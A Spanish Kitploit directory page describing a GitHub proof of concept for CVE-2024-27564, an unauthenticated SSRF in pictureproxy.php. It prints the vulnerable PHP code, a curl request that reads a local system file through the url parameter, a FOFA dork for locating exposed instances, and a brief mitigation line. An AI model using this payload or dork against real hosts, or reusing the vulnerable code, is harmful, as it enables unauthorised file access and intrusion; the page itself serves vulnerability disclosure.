Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-27564 — Prueba de concepto para CVE-2024-27564, un SSRF no autenticado en pictureproxy.php a través del parámetro url, con código vulnerable, PoC en curl y notas de mitigación. | Kitploit
Herramientas/GitHubGitHub/babydessy/cve-2024-27564
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPapers e Investigación
GitHubbabydessy/cve-2024-27564

CVE-2024-27564

Prueba de concepto para CVE-2024-27564, un SSRF no autenticado en pictureproxy.php a través del parámetro url, con código vulnerable, PoC en curl y notas de mitigación.

Ver Repositorio
33hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-27564

Descripción:

Una vulnerabilidad en pictureproxy.php permite a atacantes remotos realizar peticiones arbitrarias inyectando URLs en el parámetro url. Esta vulnerabilidad SSRF puede explotarse sin autenticación, lo que la hace particularmente peligrosa.

El código vulnerable está en el archivo pictureproxy.php. El problema ocurre porque la función no valida correctamente el parámetro url. La variable $_GET['url'] se pasa a la función file_get_contents(), que obtiene contenido de la URL especificada. Esto puede dar lugar a SSRF.

PoC:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Curl Request:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Dorking:

FOFA= "title="ChatGPT个人专用版""

Mitigación:

Se necesita una gestión adecuada de la validación de entrada.

Descargar herramienta